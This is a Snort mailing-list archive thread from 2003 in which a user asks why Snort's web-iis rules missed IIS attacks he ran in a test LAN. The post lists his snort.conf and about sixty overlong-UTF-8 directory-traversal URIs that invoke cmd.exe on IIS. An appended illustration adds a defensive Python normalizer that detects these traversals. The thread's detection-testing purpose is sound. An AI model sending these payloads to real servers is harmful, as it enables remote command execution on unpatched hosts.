Snort mailing list archives
RE: Problem with web-iis rules
From: Alex Alborzfard <alex.alborzfard () identix com>
Date: Fri, 10 Oct 2003 12:29:07 -0400
What is the OS and snort version on your snort box? Which IIS attacks did you run?

-----Original Message-----
From: Yan Zhai [mailto:yzhai () unity ncsu edu]
Sent: Friday, October 10, 2003 11:40 AM
To: snort-users () lists sourceforge net
Subject: [Snort-users] Problem with web-iis rules

Hi there,

I installed snort on my machine and launched a number of IIS attacks from my machine to another one in the LAN. The other machine is running an unpatched IIS 4.0 and the attacks are successful. Snort successfully reported the nmap portscans; however, it failed to report the IIS attacks. It seems to me that snort just doesn't load up the web-iis rules. Below is my snort.conf, which is the default snort.conf with the database output option. Can anyone point out what the problem with it is? Thanks.

var HOME_NET any
var EXTERNAL_NET any
var DNS_SERVERS $HOME_NET
var SMTP_SERVERS $HOME_NET
var HTTP_SERVERS $HOME_NET
var SQL_SERVERS $HOME_NET
var TELNET_SERVERS $HOME_NET
var HTTP_PORTS 80
var SHELLCODE_PORTS !80
var ORACLE_PORTS 1521
var AIM_SERVERS [64.12.24.0/24,64.12.25.0/24,64.12.26.14/24,64.12.28.0/24,64.12.29.0/24,64.12.161.0/24,64.12.163.0/24,205.188.5.0/24,205.188.9.0/24]
var RULE_PATH ../rules

preprocessor frag2
preprocessor rpc_decode: 111 32771
preprocessor bo

output database: log, mssql, dbname=alerts user=snortuser password=****

include classification.config
include reference.config

include $RULE_PATH/bad-traffic.rules
include $RULE_PATH/exploit.rules
include $RULE_PATH/scan.rules
include $RULE_PATH/finger.rules
include $RULE_PATH/ftp.rules
include $RULE_PATH/telnet.rules
include $RULE_PATH/rpc.rules
include $RULE_PATH/rservices.rules
include $RULE_PATH/dos.rules
include $RULE_PATH/ddos.rules
include $RULE_PATH/dns.rules
include $RULE_PATH/tftp.rules
include $RULE_PATH/web-cgi.rules
include $RULE_PATH/web-coldfusion.rules
include $RULE_PATH/web-iis.rules
include $RULE_PATH/web-frontpage.rules
include $RULE_PATH/web-misc.rules
include $RULE_PATH/web-client.rules
include $RULE_PATH/web-php.rules
include $RULE_PATH/sql.rules
include $RULE_PATH/x11.rules
include $RULE_PATH/icmp.rules
include $RULE_PATH/netbios.rules
include $RULE_PATH/misc.rules
include $RULE_PATH/attack-responses.rules
include $RULE_PATH/oracle.rules
include $RULE_PATH/mysql.rules
include $RULE_PATH/snmp.rules
include $RULE_PATH/smtp.rules
include $RULE_PATH/imap.rules
include $RULE_PATH/pop2.rules
include $RULE_PATH/pop3.rules
include $RULE_PATH/nntp.rules
include $RULE_PATH/other-ids.rules
# include $RULE_PATH/web-attacks.rules
# include $RULE_PATH/backdoor.rules
# include $RULE_PATH/shellcode.rules
# include $RULE_PATH/policy.rules
# include $RULE_PATH/porn.rules
# include $RULE_PATH/info.rules
# include $RULE_PATH/icmp-info.rules
# include $RULE_PATH/virus.rules
# include $RULE_PATH/chat.rules
# include $RULE_PATH/multimedia.rules
# include $RULE_PATH/p2p.rules
include $RULE_PATH/experimental.rules
include $RULE_PATH/local.rules

and here are the iis scripts I used:

/_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe
/_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe
/_vti_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
/cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe
/cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe
/cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe
/msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe
/msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
/msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe
/msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir
/script/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/script/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/script/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/script/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe
/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe
/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir

-Yan
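Added illustration, not part of the thread and not Snort's or IIS's code: a defender-side URI normalizer in Python that decodes the overlong-UTF-8 sequences seen in the request URIs above the way the unpatched server did, so that a detection check sees the "../" segments and the cmd.exe target that the raw, still-encoded URI hides from a literal string match. The decoding model in the comments and the sample URIs are assumptions constructed for this example.

```python
import re

# Constructed sample URIs in the shape of the ones in the post: two overlong-UTF-8
# traversals to cmd.exe and one benign FrontPage path.
SAMPLE_URIS = [
    "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
    "/msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe",
    "/_vti_bin/shtml.dll/_vti_rpc",
]
_PCT = re.compile(r"%([0-9A-Fa-f]{2})")

def percent_decode(path):
    """%XX escapes become raw bytes; a malformed escape such as %qf stays literal."""
    out, i = bytearray(), 0
    while i < len(path):
        m = _PCT.match(path, i)
        if m:
            out.append(int(m.group(1), 16)); i = m.end()
        else:
            out.append(ord(path[i]) & 0xFF); i += 1
    return bytes(out)

def lenient_utf8(data):
    """Model (an assumption, not IIS code) of the permissive decode the unpatched
    server applied: overlong forms are accepted and trailing bytes give their low 6
    bits with no 10xxxxxx check, so C0 AF, C0 2F, C1 1C, C1 9C, E0 80 AF -> '/' or '\\'."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b)); i += 1; continue
        n = 1 if b < 0xE0 else 2 if b < 0xF0 else 3 if b < 0xF8 else 4 if b < 0xFC else 5
        if b < 0xC0 or b > 0xFD or i + n >= len(data):   # bad lead byte or truncated
            out.append("\ufffd"); i += 1; continue
        cp = b & ((1 << (6 - n)) - 1)                    # payload bits of the lead byte
        for t in data[i + 1:i + 1 + n]:
            cp = (cp << 6) | (t & 0x3F)
        out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd"); i += 1 + n
    return "".join(out)

def normalize_uri(uri):
    """Path part only, decoded leniently, backslashes folded to '/', lowercased."""
    return lenient_utf8(percent_decode(uri.split("?", 1)[0])).replace("\\", "/").lower()

_TRAVERSAL_TO_CMD = re.compile(r"/\.\./.*/cmd\.exe$")

def is_traversal_to_cmd(uri):
    """Alert on a request that reaches cmd.exe via a '..' segment once normalized."""
    return _TRAVERSAL_TO_CMD.search(normalize_uri(uri)) is not None
```

A strict decoder (Python's bytes.decode("utf-8")) raises on every one of these overlong forms, which is why a detector has to normalize the way the vulnerable server did rather than the way the standard says.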
Current thread:
- Problem with web-iis rules Yan Zhai (Oct 10)
- Re: Problem with web-iis rules Matt Kettler (Oct 10)
- Re: Problem with web-iis rules Erek Adams (Oct 10)
- Re: Problem with web-iis rules Josh Berry (Oct 10)
- Re: Problem with web-iis rules Josh Berry (Oct 10)
- <Possible follow-ups>
- RE: Problem with web-iis rules snort-ml (Oct 10)
- RE: Problem with web-iis rules Yan Zhai (Oct 11)
- Re: Problem with web-iis rules Yan Zhai (Oct 11)
- RE: Problem with web-iis rules Alex Alborzfard (Oct 13)